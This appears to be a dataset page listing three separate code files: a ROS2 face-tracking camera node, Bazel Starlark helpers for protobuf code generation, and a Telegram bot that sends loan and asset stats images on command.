#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import io
import queue
import threading
import time
import sys
import rclpy
from rclpy.node import Node
from rclpy.parameter import Parameter
from std_msgs.msg import Int32MultiArray
from std_msgs.msg import MultiArrayDimension
from ros2_adafruit_pwmhat_msgs.msg import PWMPinAngle, PWMAngle
class ROS2_facelook_node(Node):
def __init__(self):
super().__init__('ros2_facelook_node', namespace='raspicam')
self.set_parameter_defaults( [
('bounding_box_topic', Parameter.Type.STRING, 'found_faces'),
('pwm_topic', Parameter.Type.STRING, '/pwmhatter/angle'),
('angle_step', Parameter.Type.DOUBLE, 1.0),
('delta_magnification', Parameter.Type.DOUBLE, 10.0),
('max_angle', Parameter.Type.DOUBLE, 80.0),
] )
self.initialize_pwm_publisher()
self.initialize_processing_queue()
self.initialize_bounding_box_subscriber()
def destroy_node(self):
# overlay Node function called when class is being stopped and camera needs closing
super().destroy_node()
def initialize_bounding_box_subscriber(self):
# Setup subscription for incoming bounding box info
self.receiver = self.create_subscription(Int32MultiArray,
self.get_parameter_value('bounding_box_topic'),
self.receive_bounding_box)
def initialize_processing_queue(self):
# Create a queue and a thread that processes messages in the queue
self.queue_lock = threading.Lock()
self.bbox_queue = queue.Queue()
# self.bbox_queue = queue.SimpleQueue() # introduced in Python 3.7
# thread to read images placed in the queue and process them
self.processor_event = threading.Event()
self.processor = threading.Thread(target=self.process_bounding_boxes, name='bounding box')
self.processor.start()
def initialize_pwm_publisher(self):
# initialize 'known' angle so first request will be sure to go out
self.pan_angle = 10000
self.tilt_angle = 10000
self.pwmmer = PWMmer(self,
self.get_parameter_value('pwm_topic'),
-self.get_parameter_value('max_angle'),
self.get_parameter_value('max_angle'),
self.get_logger())
self.send_pwm_commands(self.pan_angle, self.tilt_angle)
def stop_workers(self):
# if workers are initialized and running, tell them to stop and wait until stopped
if hasattr(self, 'processor_event') and self.processor_event != None:
self.processor_event.set()
if hasattr(self, 'processor') and self.processor.is_alive():
self.processor.join()
def receive_bounding_box(self, msg):
if type(msg) != type(None) and hasattr(msg, 'data'):
self.get_logger().debug('FLooker: receive_bbox. dataLen=%s' % (len(msg.data)))
self.bbox_queue.put(msg)
else:
self.get_logger().error('FLooker: receive_bbox. no data attribute')
def process_bounding_boxes(self):
# Take bounding boxes from the queue and send angle commands to the camera
# Initialize camera position
self.get_logger().debug('FLooker: Initializing camera to 0,0')
self.send_pwm_commands(0, 0)
# Loop for each bounding box info and update the camera movement
while True:
if self.processor_event.is_set():
break
try:
msg = self.bbox_queue.get(block=True, timeout=2)
except queue.Empty:
msg = None
if self.processor_event.is_set():
break
if type(msg) != type(None):
# Bounding boxes come in a two dimensional array:
# Row 0 => ( 0, 0, imageAreaWidth, imageAreaHeight)
# Row n => ( bb_right, bb_top, bb_width, bb_height )
bboxes = AccessInt32MultiArray(msg)
width = bboxes.get(0, 2)
widthhalf = width / 2
height = bboxes.get(0, 3)
heighthalf = height / 2
self.get_logger().debug('FLooker: process_bounding_boxes. image=%s/%s' % (width, height) )
# loop over all bounding boxes and computer the average center
wcenter = 0
wheight = 0
hcenter = 0
hwidth = 0
for ii in range(1, bboxes.rows):
wcenter = wcenter + ((bboxes.get(ii, 2) - bboxes.get(ii, 0)) / 2) + bboxes.get(ii,0)
wheight = wheight + bboxes.get(ii,3)
hcenter = hcenter + ((bboxes.get(ii, 3) - bboxes.get(ii, 1)) / 2) + bboxes.get(ii,1)
hwidth = hwidth + bboxes.get(ii,2)
waverage = wcenter / ( bboxes.rows - 1) # average horizontal center of all boxes
wheight = wheight / ( bboxes.rows - 1) # average height of all boxes
haverage = hcenter / ( bboxes.rows - 1) # average vertical center of all boxes
hwidth = hwidth / ( bboxes.rows - 1) # average width of all boxes
self.get_logger().debug('FLooker: process_bounding_boxes. averageCenter=%s/%s, averageSize=%s/%s'
% (waverage, haverage, hwidth, wheight) )
# positive deltas mean above the middle and negative deltas mean below the middle
wdelta = (width / 2) - waverage
hdelta = (height / 2) - haverage
self.get_logger().debug('FLooker: process_bounding_boxes. deltas=%s/%s'
% (wdelta, hdelta) )
if (wdelta <= -widthhalf
or wdelta >= widthhalf
or hdelta <= -heighthalf
or hdelta >= heighthalf):
self.get_logger().error('FLooker: deltas wrong! dim=%s/%s, avg=%s/%s, delta=%s/%s'
% ( width, height, waverage, haverage, wdelta, hdelta) )
else:
target_pan_angle = (self.pan_angle
+ (self.get_parameter_value('angle_step')
* self.sign(wdelta)
* abs(wdelta) / self.get_parameter_value('delta_magnification')
)
)
target_tilt_angle = (self.tilt_angle
- (self.get_parameter_value('angle_step')
* self.sign(hdelta)
* abs(hdelta) / self.get_parameter_value('delta_magnification')
)
)
self.send_pwm_commands(target_pan_angle, target_tilt_angle)
def send_pwm_commands(self, target_pan_angle, target_tilt_angle):
# Send command to PWM channels if the desired angle has changed.
# Note: uses and updates self.pan_angle and self.tilt_angle.
if target_pan_angle != self.pan_angle:
if self.pwmmer.setPWM('pan', target_pan_angle):
self.get_logger().debug('FLooker: sending chan=%s, angle=%s' % ('pan', target_pan_angle))
self.pan_angle = target_pan_angle
else:
self.get_logger().error('FLooker: target pan angle failed! targets=%s/%s'
% (target_pan_angle, target_tilt_angle) )
if target_tilt_angle != self.tilt_angle:
if self.pwmmer.setPWM('tilt', target_tilt_angle):
self.get_logger().debug('FLooker: sending chan=%s, angle=%s' % ('tilt', target_tilt_angle))
self.tilt_angle = target_tilt_angle
else:
self.get_logger().error('FLooker: target tilt angle failed! targets=%s/%s'
% (target_pan_angle, target_tilt_angle) )
def get_parameter_or(self, param, default):
# Helper function to return value of a parameter or a default if not set
ret = None
param_desc = self.get_parameter(param)
if param_desc.type_== Parameter.Type.NOT_SET:
ret = default
else:
ret = param_desc.value
return ret
def get_parameter_value(self, param):
# Helper function to return value of a parameter
ret = None
param_desc = self.get_parameter(param)
if param_desc.type_== Parameter.Type.NOT_SET:
raise Exception('Fetch of parameter that does not exist: ' + param)
else:
ret = param_desc.value
return ret
def set_parameter_defaults(self, params):
# If a parameter has not been set externally, set the value to a default.
# Passed a list of "(parameterName, parameterType, defaultValue)" tuples.
parameters_to_set = []
for (pparam, ptype, pdefault) in params:
if not self.has_parameter(pparam):
parameters_to_set.append( Parameter(pparam, ptype, pdefault) )
if len(parameters_to_set) > 0:
self.set_parameters(parameters_to_set)
def has_parameter(self, param):
# Return 'True' if a parameter by that name is specified
param_desc = self.get_parameter(param)
if param_desc.type_== Parameter.Type.NOT_SET:
return False
return True
def sign(self, val):
# Helper function that returns the sign of the passed value (1 or -1).
# Defined here so we don't have to require numpy.
return 1 if val >= 0 else -1
class PWMmer:
# Small class to hold current state of PWM channel
def __init__(self, node, topic, minVal, maxVal, logger=None):
self.node = node
self.topic = topic
self.minVal = minVal
self.maxVal = maxVal
self.logger = logger
self.channels = {}
self.logger.debug('PWMmer: init: topic=%s, min=%s, max=%s' %
(topic, str(minVal), str(maxVal)))
self.publisher = self.node.create_publisher(PWMAngle, topic)
def setPWM(self, channel, angle):
# Send the message to set the given PWM channel
ret = True
if not channel in self.channels:
self.channels[channel] = self.minVal - 1000
if angle != self.channels[channel]:
if angle >= self.maxVal or angle <= self.minVal:
self.logger.error('PWMmer: angle out of range. channel=%s, angle=%s'
% (channel, angle) )
ret = False
else:
msg = PWMAngle()
msg.chan = str(channel)
msg.angle = float(angle)
msg.angle_units = PWMAngle.DEGREES
self.publisher.publish(msg)
self.channels[channel] = angle
ret = True
return ret
class AccessInt32MultiArray:
# Wrap a multi-access array with functions for 2D access
def __init__(self, arr):
self.arr = arr
self.columns = self.ma_get_size_from_label('width')
self.rows = self.ma_get_size_from_label('height')
def rows(self):
# return the number of rows in the multi-array
return self.rows
def get(self, row, col):
# return the entry at column 'ww' and row 'hh'
return self.arr.data[col + ( row * self.columns)]
def ma_get_size_from_label(self, label):
# Return dimension size for passed label (usually 'width' or 'height')
for mad in self.arr.layout.dim:
if mad.label == label:
return int(mad.size)
return 0
class CodeTimer:
# A little helper class for timing blocks of code
def __init__(self, logger, name=None):
self.logger = logger
self.name = " '" + name + "'" if name else ''
def __enter__(self):
self.start = time.clock()
def __exit__(self, exc_type, exc_value, traceback):
self.took = (time.clock() - self.start) * 1000.0
self.logger('Code block' + self.name + ' took: ' + str(self.took) + ' ms')
def main(args=None):
rclpy.init(args=args)
ffNode = ROS2_facelook_node()
try:
rclpy.spin(ffNode)
except KeyboardInterrupt:
ffNode.get_logger().info('FLooker: Keyboard interrupt')
ffNode.stop_workers()
ffNode.destroy_node()
rclpy.shutdown()
if __name__ == '__main__':
main()
|
"""Utility functions for generating protobuf code."""
_PROTO_EXTENSION = ".proto"
def well_known_proto_libs():
return [
"@com_google_protobuf//:any_proto",
"@com_google_protobuf//:api_proto",
"@com_google_protobuf//:compiler_plugin_proto",
"@com_google_protobuf//:descriptor_proto",
"@com_google_protobuf//:duration_proto",
"@com_google_protobuf//:empty_proto",
"@com_google_protobuf//:field_mask_proto",
"@com_google_protobuf//:source_context_proto",
"@com_google_protobuf//:struct_proto",
"@com_google_protobuf//:timestamp_proto",
"@com_google_protobuf//:type_proto",
"@com_google_protobuf//:wrappers_proto",
]
def get_proto_root(workspace_root):
"""Gets the root protobuf directory.
Args:
workspace_root: context.label.workspace_root
Returns:
The directory relative to which generated include paths should be.
"""
if workspace_root:
return "/{}".format(workspace_root)
else:
return ""
def _strip_proto_extension(proto_filename):
if not proto_filename.endswith(_PROTO_EXTENSION):
fail('"{}" does not end with "{}"'.format(
proto_filename,
_PROTO_EXTENSION,
))
return proto_filename[:-len(_PROTO_EXTENSION)]
def proto_path_to_generated_filename(proto_path, fmt_str):
"""Calculates the name of a generated file for a protobuf path.
For example, "examples/protos/helloworld.proto" might map to
"helloworld.pb.h".
Args:
proto_path: The path to the .proto file.
fmt_str: A format string used to calculate the generated filename. For
example, "{}.pb.h" might be used to calculate a C++ header filename.
Returns:
The generated filename.
"""
return fmt_str.format(_strip_proto_extension(proto_path))
def _get_include_directory(include):
directory = include.path
prefix_len = 0
virtual_imports = "/_virtual_imports/"
if not include.is_source and virtual_imports in include.path:
root, relative = include.path.split(virtual_imports, 2)
result = root + virtual_imports + relative.split("/", 1)[0]
return result
if not include.is_source and directory.startswith(include.root.path):
prefix_len = len(include.root.path) + 1
if directory.startswith("external", prefix_len):
external_separator = directory.find("/", prefix_len)
repository_separator = directory.find("/", external_separator + 1)
return directory[:repository_separator]
else:
return include.root.path if include.root.path else "."
def get_include_protoc_args(includes):
"""Returns protoc args that imports protos relative to their import root.
Args:
includes: A list of included proto files.
Returns:
A list of arguments to be passed to protoc. For example, ["--proto_path=."].
"""
return [
"--proto_path={}".format(_get_include_directory(include))
for include in includes
]
def get_plugin_args(plugin, flags, dir_out, generate_mocks):
"""Returns arguments configuring protoc to use a plugin for a language.
Args:
plugin: An executable file to run as the protoc plugin.
flags: The plugin flags to be passed to protoc.
dir_out: The output directory for the plugin.
generate_mocks: A bool indicating whether to generate mocks.
Returns:
A list of protoc arguments configuring the plugin.
"""
augmented_flags = list(flags)
if generate_mocks:
augmented_flags.append("generate_mock_code=true")
return [
"--plugin=protoc-gen-PLUGIN=" + plugin.path,
"--PLUGIN_out=" + ",".join(augmented_flags) + ":" + dir_out,
]
def _get_staged_proto_file(context, source_file):
if source_file.dirname == context.label.package:
return source_file
else:
copied_proto = context.actions.declare_file(source_file.basename)
context.actions.run_shell(
inputs = [source_file],
outputs = [copied_proto],
command = "cp {} {}".format(source_file.path, copied_proto.path),
mnemonic = "CopySourceProto",
)
return copied_proto
def protos_from_context(context):
"""Copies proto files to the appropriate location.
Args:
context: The ctx object for the rule.
Returns:
A list of the protos.
"""
protos = []
for src in context.attr.deps:
for file in src[ProtoInfo].direct_sources:
protos.append(_get_staged_proto_file(context, file))
return protos
def includes_from_deps(deps):
"""Get includes from rule dependencies."""
return [
file
for src in deps
for file in src[ProtoInfo].transitive_imports.to_list()
]
def get_proto_arguments(protos, genfiles_dir_path):
"""Get the protoc arguments specifying which protos to compile."""
arguments = []
for proto in protos:
massaged_path = proto.path
if massaged_path.startswith(genfiles_dir_path):
massaged_path = proto.path[len(genfiles_dir_path) + 1:]
arguments.append(massaged_path)
return arguments
def declare_out_files(protos, context, generated_file_format):
"""Declares and returns the files to be generated."""
return [
context.actions.declare_file(
proto_path_to_generated_filename(
proto.basename,
generated_file_format,
),
)
for proto in protos
]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Basic bot framework forked from Andrés Ignacio Torres <andresitorresm@gmail.com>,
all other files by Al Matty <al@almatty.com>.
"""
import time, os
import random
import logging
from telegram.ext import CommandHandler, Filters, MessageHandler, Updater
class MerchBot:
"""
A class to encapsulate all relevant methods of the bot.
"""
def __init__(self):
"""
Constructor of the class. Initializes certain instance variables
and checks if everything's O.K. for the bot to work as expected.
"""
# This environment variable should be set before using the bot
self.token = os.environ['STATS_BOT_TOKEN']
# These will be checked against as substrings within each
# message, so different variations are not required if their
# radix is present (e.g. "all" covers "/all" and "ball")
self.menu_trigger = ['/all', '/stats']
self.loan_stats_trigger = ['/loans']
self.il_trigger = ['/IL']
self.assets_trigger = ['/assets']
# Stops runtime if the token has not been set
if self.token is None:
raise RuntimeError(
"FATAL: No token was found. " + \
"You might need to specify one or more environment variables.")
# Configures logging in debug level to check for errors
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
level=logging.INFO)
def run_bot(self):
"""
Sets up the required bot handlers and starts the polling
thread in order to successfully reply to messages.
"""
# Instantiates the bot updater
self.updater = Updater(self.token, use_context=True)
self.dispatcher = self.updater.dispatcher
# Declares and adds a handler for text messages that will reply with
# content if a user message includes a trigger word
text_handler = MessageHandler(Filters.text, self.handle_text_messages)
self.dispatcher.add_handler(text_handler)
# Fires up the polling thread. We're live!
self.updater.start_polling()
def send_textfile(self, textfile, update, context):
"""
Takes a textfile (path) and sends it as mesage to the user.
"""
with open(textfile, 'r') as file:
MSG = file.read()
context.bot.send_message(chat_id=update.message.chat_id, text=MSG)
def send_str(self, msg_str, update, context):
"""
Takes a string and sends it as mesage to the user.
"""
MSG = msg_str
context.bot.send_message(chat_id=update.message.chat_id, text=MSG)
def show_menu(self, update, context):
"""
Shows the menu with current items.
"""
msg_file = 'menu_msg.txt'
self.send_textfile(msg_file, update, context)
def send_signature(self, update, context):
"""
Sends out a signature message specified in a text file.
"""
msg_file = 'signature_msg.txt'
self.send_textfile(msg_file, update, context)
def sendPic(self, pic_file, update, context, caption=None):
"""
Sends picture as specified in pic_file.
"""
# Send image
with open(pic_file, 'rb') as img:
# Sends the picture
context.bot.send_photo(
chat_id=update.message.chat_id,
photo=img,
caption=caption
)
# Some protection against repeatedly calling a bot function
time.sleep(0.3)
def show_loan_stats(self, update, context):
"""
Sends out a preliminary message plus the loan stats infographic.
"""
# Send preliminary message
msg = 'Some message...'
self.send_str(msg, update, context)
# Send pic
self.sendPic('loans.png', update, context)
def show_il(self, update, context):
"""
Sends out a preliminary message plus the IL infographic.
"""
# Send preliminary message
msg = 'Some other message...'
self.send_str(msg, update, context)
# Send pic
self.sendPic('il.png', update, context)
def show_assets(self, update, context):
"""
Sends out a preliminary message plus the IL infographic.
"""
# Send preliminary message
msg = 'Some other message...'
self.send_str(msg, update, context)
# Send pic
self.sendPic('assets.png', update, context)
def handle_text_messages(self, update, context):
"""
Encapsulates all logic of the bot to conditionally reply with content
based on trigger words.
"""
# Split user input into single words
words = set(update.message.text.lower().split())
logging.debug(f'Received message: {update.message.text}')
# For debugging: Log users that received something from bot
chat_user_client = update.message.from_user.username
if chat_user_client == None:
chat_user_client = update.message.chat_id
# Possibility: received command from menu_trigger
for Trigger in self.menu_trigger:
for word in words:
if word.startswith(Trigger):
self.show_menu(update, context)
logging.info(f'{chat_user_client} checked out the menu!')
return
# Possibility: received command from loan_stats_trigger
for Trigger in self.loan_stats_trigger:
for word in words:
if word.startswith(Trigger):
#self.send_textfile('under_construction.txt', update, context)
self.show_loan_stats(update, context)
self.send_signature(update, context)
logging.info(f'{chat_user_client} got loan stats!')
return
# Possibility: received command from il_trigger
for Trigger in self.il_trigger:
for word in words:
if word.startswith(Trigger):
self.send_textfile('under_construction.txt', update, context)
#self.show_il(update, context)
#self.send_signature(update, context)
logging.info(f'{chat_user_client} tried to get IL info!')
return
# Possibility: received command from assets_trigger
for Trigger in self.assets_trigger:
for word in words:
if word.startswith(Trigger):
self.send_textfile('under_construction.txt', update, context)
#self.self.show_assets(update, context)
#self.send_signature(update, context)
logging.info(f'{chat_user_client} tried to get asset info!')
return
def main():
"""
Entry point of the script. If run directly, instantiates the
MerchBot class and fires it up!
"""
merch_bot = MerchBot()
merch_bot.run_bot()
# If the script is run directly, fires the main procedure
if __name__ == "__main__":
main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.